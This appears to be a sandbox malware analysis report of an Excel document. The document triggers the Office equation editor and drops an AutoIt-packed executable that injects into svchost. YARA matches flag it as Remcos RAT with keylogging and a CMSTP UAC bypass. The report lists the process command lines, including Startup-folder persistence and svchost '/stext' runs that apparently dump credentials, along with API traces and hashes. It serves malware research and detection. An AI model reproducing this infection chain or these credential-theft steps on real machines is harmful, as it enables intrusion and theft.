{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V0%2F1GJYf5MyI7Sn5jmn%2BlGFctlaZA%2BMnrg6%2BxwoMABYFrPygms8SzhK0fDbfikQOs%2FiC5nxhfxSlq762s2le1QHKbmCBWqKIdMef9Jyfxvxtzb8XD%2F6WscQ44g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d17d78d2b0e7295-EWR alt-svc: h3=":443"; ma=86400

Target ID:	0
Start time:	10:39:20
Start date:	12/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13f4c0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	10:39:43
Start date:	12/10/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Imagebase:	0x13f970000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:39:54
Start date:	12/10/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:39:57
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Roaming\taskhostw.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\taskhostw.exe"
Imagebase:	0x1b0000
File size:	1'290'752 bytes
MD5 hash:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:39:59
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\taskhostw.exe"
Imagebase:	0x1260000
File size:	1'290'752 bytes
MD5 hash:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:40:00
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\taskhostw.exe"
Imagebase:	0x3d0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	10:40:03
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"
Imagebase:	0x3d0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:40:03
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"
Imagebase:	0x3d0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:40:03
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"
Imagebase:	0x3d0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:40:12
Start date:	12/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0xff200000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:40:12
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x1260000
File size:	1'290'752 bytes
MD5 hash:	6539C2C942C9AA3AB9C7FE14FCCF0B4E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:40:14
Start date:	12/10/2024
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x3d0000
File size:	20'992 bytes
MD5 hash:	54A47F6B5E09A77E61649109C6A08866
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

VBA Code

Call Graph

Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Sheet1

Declaration

Line	Content
1	Attribute VB_Name = "Sheet1"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet2

Declaration

Line	Content
1	Attribute VB_Name = "Sheet2"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: Sheet3

Declaration

Line	Content
1	Attribute VB_Name = "Sheet3"
2	Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Module: ThisWorkbook

Declaration

Line	Content
1	Attribute VB_Name = "ThisWorkbook"
2	Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True

Reset < >

Analysis Process: taskhostw.exePID: 3260, Parent PID: 3164COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	15.9%
Signature Coverage:	11.7%
Total number of Nodes:	1553
Total number of Limit Nodes:	29

Executed Functions

Function 001B3B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B3B7A
IsDebuggerPresent.KERNEL32 ref: 001B3B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,002752F8,002752E0,?,?), ref: 001B3BFD

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

Part of subcall function 001C0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,001B3C26,002752F8,?,?,?), ref: 001C0ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 001B3C81
MessageBoxA.USER32 ref: 001ED3EC
SetCurrentDirectoryW.KERNEL32(?,002752F8,?,?,?), ref: 001ED424
GetForegroundWindow.USER32 ref: 001ED4AA
ShellExecuteW.SHELL32(00000000,?,?), ref: 001ED4B1

Part of subcall function 001B3A58: GetSysColorBrush.USER32 ref: 001B3A62
Part of subcall function 001B3A58: LoadCursorW.USER32 ref: 001B3A71
Part of subcall function 001B3A58: LoadIconW.USER32 ref: 001B3A88
Part of subcall function 001B3A58: LoadIconW.USER32 ref: 001B3A9A
Part of subcall function 001B3A58: LoadIconW.USER32 ref: 001B3AAC
Part of subcall function 001B3A58: LoadImageW.USER32 ref: 001B3AD2
Part of subcall function 001B3A58: RegisterClassExW.USER32(?), ref: 001B3B28

Part of subcall function 001B39E7: CreateWindowExW.USER32 ref: 001B3A15
Part of subcall function 001B39E7: CreateWindowExW.USER32 ref: 001B3A36
Part of subcall function 001B39E7: ShowWindow.USER32(00000000), ref: 001B3A4A
Part of subcall function 001B39E7: ShowWindow.USER32(00000000), ref: 001B3A53

Part of subcall function 001B43DB: _memset.LIBCMT ref: 001B4401
Part of subcall function 001B43DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001B44A6

Strings

runas, xrefs: 001ED4A5
This is a third-party compiled AutoIt script., xrefs: 001ED3E4
%$, xrefs: 001B3C56

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%$
API String ID: 529118366-2487362596
Opcode ID: 91ac11d970c73f51697be6e7d0a6990db53701b984eb63e2d68fd3d6abc0353c
Instruction ID: 52abe9916203ab6f7f951a6dc8fc768c216ed46d88db56a50eccaf88ec8ae82c
Opcode Fuzzy Hash: 91ac11d970c73f51697be6e7d0a6990db53701b984eb63e2d68fd3d6abc0353c
Instruction Fuzzy Hash: 4651E830D04659AECF12EBF4FC4AEFDBB75AF55300B004166F865B21A2DBB05695CB21

Function 001B4AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 001B4B2B

Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66

GetCurrentProcess.KERNEL32(?,0023FAEC,00000000,00000000,?), ref: 001B4BF8
IsWow64Process.KERNEL32(00000000), ref: 001B4BFF
GetNativeSystemInfo.KERNEL32(00000000), ref: 001B4C45
FreeLibrary.KERNEL32(00000000), ref: 001B4C50
GetSystemInfo.KERNEL32(00000000), ref: 001B4C81
GetSystemInfo.KERNEL32(00000000), ref: 001B4C8D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b6f044716540773103a1468fcbc8d2d548084852c24d38448495e211f3b98e14
Instruction ID: 61892d153d6be9ee387faea70224417b9b83ad6289a8e1501fc2c209843c9a6f
Opcode Fuzzy Hash: b6f044716540773103a1468fcbc8d2d548084852c24d38448495e211f3b98e14
Instruction Fuzzy Hash: 6791D53154ABC0DFC735DB68A5511EAFFE4AF2A300B488A9DD0CB93A42D321E908D759

Function 001B4FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001B4FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001B4EEE,?,?,00000000,00000000), ref: 001B5010
LoadResource.KERNEL32(?,00000000,?,?,001B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001B4F8F), ref: 001EDC90
SizeofResource.KERNEL32(?,00000000,?,?,001B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001B4F8F), ref: 001EDCA5
LockResource.KERNEL32(001B4EEE,?,?,001B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001B4F8F,00000000), ref: 001EDCB8

Strings

SCRIPT, xrefs: 001B5006

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 94b550dd5ecf0b5cde9a025f7fa1634f62cdb1dbb632aca26ff713c454fc1e06
Instruction ID: f8c780bdc2b4d21cd3953b15869a31a4975b2ffadb72e53bf1ea447fd756e6e9
Opcode Fuzzy Hash: 94b550dd5ecf0b5cde9a025f7fa1634f62cdb1dbb632aca26ff713c454fc1e06
Instruction Fuzzy Hash: A1117C75600B00BFD7219F65ED48FA77BBAEBC9B51F20416CF806C6260DB72EC008660

Function 001BFE40 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%$, xrefs: 001BFE53
pb', xrefs: 001F4D12

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: BuffCharUpper
String ID: pb'$%$
API String ID: 3964851224-3835717432
Opcode ID: 670c0d96cb1e54c1ac88fe420c76192eb168f977375795ff269378f7f19cd64e
Instruction ID: 40d993f275beb1516e7350b24999a8d2df9c5d4ffd130229754b2251c527275b
Opcode Fuzzy Hash: 670c0d96cb1e54c1ac88fe420c76192eb168f977375795ff269378f7f19cd64e
Instruction Fuzzy Hash: 9B924470608341CFD725DF28C480B6BB7E1BBA8304F15896DE98A9B362D775EC45CB92

Function 001BE800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 001F41BB
Dd', xrefs: 001F3E4E
Dd', xrefs: 001BEC21
Dd', xrefs: 001F3E87
Dd', xrefs: 001BEC1A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID: Dd'$Dd'$Dd'$Dd'$Variable must be of type 'Object'.
API String ID: 0-1820525575
Opcode ID: 4934b6335afedb7dd6190d61431c88147e2d8b204acf5ed6ce50655d811009f7
Instruction ID: 305da9eea208faa85da220ea0314261d354a4b58ead4ed836bb013cb1cd1554e
Opcode Fuzzy Hash: 4934b6335afedb7dd6190d61431c88147e2d8b204acf5ed6ce50655d811009f7
Instruction Fuzzy Hash: 82A26A74A00219CFCB24CF58C894AEAB7F2FF58314F258069E916AB351D735ED86CB91

Function 0021449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,001EE6F1), ref: 002144AB
FindFirstFileW.KERNEL32(?,?), ref: 002144BC
FindClose.KERNEL32(00000000), ref: 002144CC

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 2ffb3eec15e66bfe97b1762f873ace1fd6c23cf9f5fa32e25955ee395da9f38c
Instruction ID: 4006ef8f06476e36b5473bdacf82d833135b82f1bcd99cb237d6ffbc22a84302
Opcode Fuzzy Hash: 2ffb3eec15e66bfe97b1762f873ace1fd6c23cf9f5fa32e25955ee395da9f38c
Instruction Fuzzy Hash: 28E0D832C20402978210BB38FC0D8EA779CAE25335F100715F93DC20E0E77459608595

Function 001C0B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C0BBB
timeGetTime.WINMM ref: 001C0E76
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C0FB3
Sleep.KERNEL32(0000000A), ref: 001C0FC1
LockWindowUpdate.USER32(00000000), ref: 001C105A
DestroyWindow.USER32 ref: 001C1066
GetMessageW.USER32 ref: 001C1080
Sleep.KERNEL32(0000000A,?,?), ref: 001F51DC
TranslateMessage.USER32(?), ref: 001F5FB9
DispatchMessageW.USER32(?), ref: 001F5FC7
GetMessageW.USER32 ref: 001F5FDB

Strings

@COM_EVENTOBJ, xrefs: 001F5849
@GUI_CTRLHANDLE, xrefs: 001F533D
pb', xrefs: 001F5307
@GUI_WINHANDLE, xrefs: 001F52E8
@TRAY_ID, xrefs: 001F5AE8
pb', xrefs: 001F535C
pb', xrefs: 001F52B2
@GUI_CTRLID, xrefs: 001F5293
pb', xrefs: 001F5B0D

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb'$pb'$pb'$pb'
API String ID: 4212290369-1124401940
Opcode ID: 36771116027b877511f8528b1e89dd867227fdcc5d5d47426e2948fa9f9a2512
Instruction ID: 23e85f707f45b1ce7a2811ee83509690657d93a752e432ffa61541e647a2a741
Opcode Fuzzy Hash: 36771116027b877511f8528b1e89dd867227fdcc5d5d47426e2948fa9f9a2512
Instruction Fuzzy Hash: EEB2C170608741DFD729DF24C885FAAB7E6BF94304F14491DF69A872A1DB70E885CB82

Function 002191FE Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00219008: __time64.LIBCMT ref: 00219012

Part of subcall function 001B5045: _fseek.LIBCMT ref: 001B505D

__wsplitpath.LIBCMT ref: 002192DD

Part of subcall function 001D426E: __wsplitpath_helper.LIBCMT ref: 001D42AE

_wcscpy.LIBCMT ref: 002192F0
_wcscat.LIBCMT ref: 00219303
__wsplitpath.LIBCMT ref: 00219328
_wcscat.LIBCMT ref: 0021933E
_wcscat.LIBCMT ref: 00219351

Part of subcall function 0021904E: _memmove.LIBCMT ref: 00219087
Part of subcall function 0021904E: _memmove.LIBCMT ref: 00219096

_wcscmp.LIBCMT ref: 00219298

Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198CD
Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198E0

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002194FB
_wcsncpy.LIBCMT ref: 0021956E
DeleteFileW.KERNEL32(?,?), ref: 002195A4
CopyFileW.KERNEL32 ref: 002195BA
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002195CB
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002195DD

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
